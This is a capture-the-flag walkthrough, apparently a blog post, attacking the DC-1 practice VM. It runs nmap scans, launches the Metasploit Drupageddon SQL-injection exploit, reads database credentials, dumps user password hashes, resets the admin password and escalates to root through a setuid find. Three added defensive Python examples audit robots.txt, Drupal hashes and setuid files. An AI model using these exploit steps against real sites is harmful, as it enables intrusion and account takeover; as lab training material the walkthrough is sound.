DC1 target machine practice

Environment

Kali 2018, the DC target machine, running as VMs

Scan host

1. Check the MAC address of the DC VM in net mode.
2. Start the DC VM, then in Kali run:

nmap -sn 192.168.80.0/24 

Among the scanned addresses, 192.168.80.138 is Kali itself and 192.168.80.139 is the DC target machine. Opening that IP in a browser shows the DC site's front page.

The site reveals that it runs Drupal; with no other information available, move on to a port scan.

Port scan

nmap -p- -A -v 192.168.80.139

The scan turns up 4 ports. On port 80, nmap reports a robots.txt, which can be fetched directly; its content is:

#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites like Yahoo!
# and Google. By telling these "robots" where not to go on your site,
# you save bandwidth and server resources.
#
# This file will be ignored unless it is at the root of your host:
# Used:    http://example.com/robots.txt
# Ignored: http://example.com/site/robots.txt
#
# For more information about the robots.txt standard, see:
# http://www.robotstxt.org/wc/robots.html
#
# For syntax checking, see:
# http://www.sxw.org.uk/computing/robots/check.html

User-agent: *
Crawl-delay: 10
# Directories
Disallow: /includes/
Disallow: /misc/
Disallow: /modules/
Disallow: /profiles/
Disallow: /scripts/
Disallow: /themes/
# Files
Disallow: /CHANGELOG.txt
Disallow: /cron.php
Disallow: /INSTALL.mysql.txt
Disallow: /INSTALL.pgsql.txt
Disallow: /INSTALL.sqlite.txt
Disallow: /install.php
Disallow: /INSTALL.txt
Disallow: /LICENSE.txt
Disallow: /MAINTAINERS.txt
Disallow: /update.php
Disallow: /UPGRADE.txt
Disallow: /xmlrpc.php
# Paths (clean URLs)
Disallow: /admin/
Disallow: /comment/reply/
Disallow: /filter/tips/
Disallow: /node/add/
Disallow: /search/
Disallow: /user/register/
Disallow: /user/password/
Disallow: /user/login/
Disallow: /user/logout/
# Paths (no clean URLs)
Disallow: /?q=admin/
Disallow: /?q=comment/reply/
Disallow: /?q=filter/tips/
Disallow: /?q=node/add/
Disallow: /?q=search/
Disallow: /?q=user/password/
Disallow: /?q=user/register/
Disallow: /?q=user/login/
Disallow: /?q=user/logout/

This yields no further useful information, so the next step is to scan the website's directories.
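The robots.txt above is worth a second look from the defender's side: it is only advice to well-behaved crawlers, not access control, and the paths it lists (install.php, update.php, xmlrpc.php, /admin/) are precisely the ones a reviewer should confirm are removed or protected by real authentication. The following parser is an added example, not code from the original post; it splits a robots.txt into user-agent groups and flags disallowed paths that look like maintenance or admin endpoints. The sample text is an abbreviated copy of the Drupal default file shown above, and the keyword list SENSITIVE_MARKERS is an assumption chosen for this example.

```python
"""Parse robots.txt and flag disallowed paths that look like admin/maintenance
endpoints.  Added example, not part of the original post."""
from __future__ import annotations
from dataclasses import dataclass, field

# Assumption for this example: substrings that usually mark install,
# maintenance or admin endpoints that must not rely on robots.txt for protection.
SENSITIVE_MARKERS = ("install", "update", "cron", "xmlrpc", "admin", "login")

# Constructed sample: abbreviated from the Drupal 7 default robots.txt above.
SAMPLE_ROBOTS = """\
# Drupal 7 default robots.txt (abbreviated)
User-agent: *
Crawl-delay: 10
# Directories
Disallow: /includes/
Disallow: /modules/
# Files
Disallow: /cron.php
Disallow: /install.php
Disallow: /update.php
Disallow: /xmlrpc.php
# Paths (clean URLs)
Disallow: /admin/
Disallow: /user/login/
Disallow: /search/
# Paths (no clean URLs)
Disallow: /?q=admin/
Disallow: /?q=user/login/
"""


@dataclass
class RobotsGroup:
    """One block of directives applying to the listed user agents."""
    agents: list[str] = field(default_factory=list)
    disallow: list[str] = field(default_factory=list)
    allow: list[str] = field(default_factory=list)
    crawl_delay: float | None = None


def parse_robots(text: str) -> list[RobotsGroup]:
    """Split robots.txt into user-agent groups; comments run to end of line."""
    groups: list[RobotsGroup] = []
    current: RobotsGroup | None = None
    last_was_agent = False
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or ":" not in line:
            continue
        key, _, value = line.partition(":")   # first colon only: paths may contain ':'
        key, value = key.strip().lower(), value.strip()
        if key == "user-agent":
            # Consecutive User-agent lines share one group; otherwise start a new one.
            if current is None or not last_was_agent:
                current = RobotsGroup()
                groups.append(current)
            current.agents.append(value)
            last_was_agent = True
            continue
        last_was_agent = False
        if current is None:                   # directive before any User-agent
            continue
        if key == "disallow" and value:
            current.disallow.append(value)
        elif key == "allow" and value:
            current.allow.append(value)
        elif key == "crawl-delay":
            try:
                current.crawl_delay = float(value)
            except ValueError:
                pass                          # malformed delay: ignore, as crawlers do
    return groups


def sensitive_paths(groups: list[RobotsGroup]) -> list[str]:
    """Disallowed paths whose name suggests an admin or maintenance endpoint."""
    found = {p for g in groups for p in g.disallow
             if any(m in p.lower() for m in SENSITIVE_MARKERS)}
    return sorted(found)


if __name__ == "__main__":
    parsed = parse_robots(SAMPLE_ROBOTS)
    for g in parsed:
        print("agents:", g.agents, "crawl-delay:", g.crawl_delay,
              "disallow:", len(g.disallow))
    print("check these are actually access-controlled:")
    for p in sensitive_paths(parsed):
        print("  ", p)
```

Each flagged path is a candidate for a follow-up check in the web server or Drupal configuration (is install.php removed after installation, is /admin/ behind authentication), because listing it in robots.txt only tells crawlers to skip it.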

Use the directory scanner in msfconsole to scan website directories:

root@kali:~# msfconsole
msf > use auxiliary/scanner/http/dir_scanner
msf auxiliary(scanner/http/dir_scanner) > set RHOSTS 192.168.80.139
msf auxiliary(scanner/http/dir_scanner) > set THREADS 20
msf auxiliary(scanner/http/dir_scanner) > show options
msf auxiliary(scanner/http/dir_scanner) > run

Most of the paths found return 403, and the rest are of no practical use.

Search msfconsole for Drupal-related modules:

msf > search drupal

The search returns:

Matching Modules
================

   Name                                           Disclosure Date  Rank       Description
   ----                                           ---------------  ----       -----------
   auxiliary/gather/drupal_openid_xxe             2012-10-17       normal     Drupal OpenID External Entity Injection
   auxiliary/scanner/http/drupal_views_user_enum  2010-07-02       normal     Drupal Views Module Users Enumeration
   exploit/multi/http/drupal_drupageddon          2014-10-15       excellent  Drupal HTTP Parameter Key/Value SQL Injection
   exploit/unix/webapp/drupal_coder_exec          2016-07-13       excellent  Drupal CODER Module Remote Command Execution
   exploit/unix/webapp/drupal_drupalgeddon2       2018-03-28       excellent  Drupal Drupalgeddon 2 Forms API Property Injection
   exploit/unix/webapp/drupal_restws_exec         2016-07-13       excellent  Drupal RESTWS Module Remote PHP Code Execution
   exploit/unix/webapp/php_xmlrpc_eval            2005-06-29       excellent  PHP XML-RPC Arbitrary Code Execution


Use the third module (the Drupageddon SQL injection) and run the following commands in sequence:

msf > use exploit/multi/http/drupal_drupageddon
msf exploit(multi/http/drupal_drupageddon) > set RHOST 192.168.80.139
RHOST => 192.168.80.139
msf exploit(multi/http/drupal_drupageddon) > run

Getting a session back indicates that the injection succeeded.

Running ls in the session reveals a flag1.txt file. It contains a hint, so the next step is to find the configuration file.

Drupal's configuration file is at /sites/default/settings.php; change to that directory and read it.

Database operations

Connecting to the database from the session fails at first. Run shell to drop into a system shell and enter the command again; the connection then succeeds, but output is not echoed back.

mysql -udbuser -p

Spawn a proper TTY so that output is echoed in the shell:

python -c 'import pty;pty.spawn("/bin/sh")'

Query the users table:

mysql> select * from users;
select * from users;
+-----+-------+---------------------------------------------------------+-------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-------------------+------+
| uid | name  | pass                                                    | mail              | theme | signature | signature_format | created    | access     | login      | status | timezone            | language | picture | init              | data |
+-----+-------+---------------------------------------------------------+-------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-------------------+------+
|   0 |       |                                                         |                   |       |           | NULL             |          0 |          0 |          0 |      0 | NULL                |          |       0 |                   | NULL |
|   1 | admin | $S$DvQI6Y600iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDR | [email protected] |       |           | NULL             | 1550581826 | 1550583852 | 1550582362 |      1 | Australia/Melbourne |          |       0 | [email protected] | b:0; |
|   2 | Fred  | $S$DWGrxef6.D0cwB5Ts.GlnLw15chRRWH2s1R3QBwC0EkvBQ/9TCGg | [email protected]  |       |           | filtered_html    | 1550581952 | 1550582225 | 1550582225 |      1 | Australia/Melbourne |          |       0 | [email protected]  | b:0; |
+-----+-------+---------------------------------------------------------+-------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-------------------+------+
3 rows in set (0.00 sec)

From the shell, run the command to generate the new password, then go back to the database and update the password.
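The pass column above holds Drupal 7 hashes in its `$S$` format: `$S$`, one cost character, an 8-character salt, then the SHA-512 result iterated 2^cost times and encoded in a phpass-style base64, truncated to 55 characters. The password-update step replaces one of these strings. As an added example (not code from the original post), the block below reimplements that scheme in Python following Drupal 7 core's includes/password.inc, so that an auditor can read the cost of a stored hash and verify that a reset password actually matches the new hash; the test password is constructed for the example.

```python
"""Drupal 7 '$S$' password hashes: read the cost from a stored hash and verify a
password against it.  Added example reimplementing Drupal 7's includes/password.inc
(salted SHA-512, 2^cost iterations, phpass-style base64); not from the original post."""
import hashlib
import math
import os

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
HASH_LENGTH = 55            # DRUPAL_HASH_LENGTH: stored hash is truncated to 55 chars
MIN_LOG2, MAX_LOG2 = 7, 30  # DRUPAL_MIN/MAX_HASH_COUNT
DEFAULT_LOG2 = 15           # DRUPAL_HASH_COUNT: 2^15 = 32768 iterations


def _b64(data: bytes) -> str:
    """phpass-style base64 (ITOA64 alphabet, no padding), as in password.inc."""
    out, i, count = [], 0, len(data)
    while True:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < count:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= count:
            break
        i += 1
        if i < count:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= count:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
        if i >= count:
            break
    return "".join(out)


def iteration_count(stored: str) -> int:
    """Decode the cost character (4th char) of a $S$/$P$/$H$ hash into iterations."""
    if len(stored) < 4 or stored[0] != "$" or stored[2] != "$":
        raise ValueError("not a phpass-style hash")
    log2 = ITOA64.find(stored[3])
    if not MIN_LOG2 <= log2 <= MAX_LOG2:
        raise ValueError("cost outside Drupal's accepted range")
    return 1 << log2


def _crypt(algo: str, password: str, setting: str):
    """Port of _password_crypt(): returns the 55-char hash or None on bad input."""
    if len(password) > 512:
        return None
    setting = setting[:12]                 # "$S$" + cost char + 8-char salt
    try:
        count = iteration_count(setting)
    except ValueError:
        return None
    salt = setting[4:12]
    if len(salt) != 8:
        return None
    pw = password.encode()
    h = hashlib.new(algo, salt.encode() + pw).digest()
    for _ in range(count):                 # PHP: do { ... } while (--$count)
        h = hashlib.new(algo, h + pw).digest()
    output = setting + _b64(h)
    expected = 12 + math.ceil(8 * len(h) / 6)
    return output[:HASH_LENGTH] if len(output) == expected else None


def hash_password(password: str, log2: int = DEFAULT_LOG2) -> str:
    """Port of user_hash_password(): fresh 6-byte salt, SHA-512, 2^log2 rounds."""
    log2 = min(max(log2, MIN_LOG2), MAX_LOG2)
    setting = "$S$" + ITOA64[log2] + _b64(os.urandom(6))
    return _crypt("sha512", password, setting)


def check_password(password: str, stored: str) -> bool:
    """Port of user_check_password() for $S$ (and legacy $P$/$H$ MD5) hashes."""
    kind = stored[:3]
    if kind == "$S$":
        computed = _crypt("sha512", password, stored)
    elif kind in ("$H$", "$P$"):
        computed = _crypt("md5", password, stored)
    else:
        return False
    return computed is not None and computed == stored


if __name__ == "__main__":
    # Cost of the admin hash shown in the users table above.
    print(iteration_count("$S$DvQI6Y600iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDR"))
    new_hash = hash_password("constructed-example-pw")   # constructed test value
    print(new_hash, check_password("constructed-example-pw", new_hash))
```

Reading the cost character is a quick sanity check when reviewing a Drupal database: every `$S$` hash here uses `D`, i.e. 2^15 rounds, the Drupal 7 default; a hash with a lower cost character, or a `$P$`/`$H$` prefix left over from a migration, is weaker than the site's policy intends.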

Log in as admin in the browser to find flag3.

Use the find command to escalate privileges

flag3 hints that special permissions are needed to get at the password. First check the passwd file to find flag4's location. Reading flag4 there shows that privileges must be escalated to go further. Back in the shell, use the find command, which runs as root on this machine, to execute commands; this leads to the final flag. View it, and that is the end!
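The privilege escalation above works only because find on this machine runs with root privileges, which is the kind of misconfiguration a defender should detect before anyone else does. The following audit is an added example, not code from the original post: it walks a filesystem tree, lists regular files with the setuid bit, and reports those not in an expected baseline. The BASELINE set is an assumption (a few setuid binaries common on Debian-based systems) and the fixture directory is constructed inside the example so it runs offline.

```python
"""Audit a tree for setuid binaries and flag ones outside a baseline.
Added example, not from the original post."""
import os
import stat
import tempfile

# Assumed baseline: setuid binaries normally expected on a Debian-style host.
BASELINE = {"passwd", "su", "sudo", "mount", "umount", "chsh", "chfn",
            "newgrp", "gpasswd", "ping"}


def find_suid(root: str) -> list:
    """Return sorted paths of regular files under root with the setuid bit set."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)          # lstat: do not follow symlinks
            except OSError:
                continue                     # unreadable entry: skip, keep going
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(path)
    return sorted(hits)


def unexpected_suid(paths, baseline=BASELINE) -> list:
    """Setuid files whose basename is not in the expected baseline."""
    return [p for p in paths if os.path.basename(p) not in baseline]


def build_fixture() -> str:
    """Constructed fixture: a temp tree mimicking /usr/bin with three files."""
    root = tempfile.mkdtemp(prefix="suid-audit-")
    bindir = os.path.join(root, "usr", "bin")
    os.makedirs(bindir)
    # passwd is setuid and expected; find is setuid and NOT expected; ls is plain.
    for name, mode in (("passwd", 0o4755), ("find", 0o4755), ("ls", 0o755)):
        path = os.path.join(bindir, name)
        with open(path, "w") as fh:
            fh.write("#!/bin/sh\n")          # placeholder content only
        os.chmod(path, mode)
    return root


def audit(root: str) -> dict:
    """Summarise setuid files under root by basename."""
    found = find_suid(root)
    return {
        "setuid": [os.path.basename(p) for p in found],
        "unexpected": [os.path.basename(p) for p in unexpected_suid(found)],
    }


if __name__ == "__main__":
    fixture = build_fixture()
    print(audit(fixture))       # on a real host: audit("/usr") or audit("/")
```

The walk does what `find / -perm -4000 -type f` does from the shell, but keeping the result as data makes it easy to diff against a stored baseline on each run; any new entry, such as a setuid find, is worth an alert.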

cat thefinalflag.txt
Well done!!!!

Hopefully you've enjoyed this and learned some new skills.

You can let me know what you thought of this little journey
by contacting me via Twitter - @DCAU7


Origin blog.csdn.net/weixin_44236278/article/details/115062828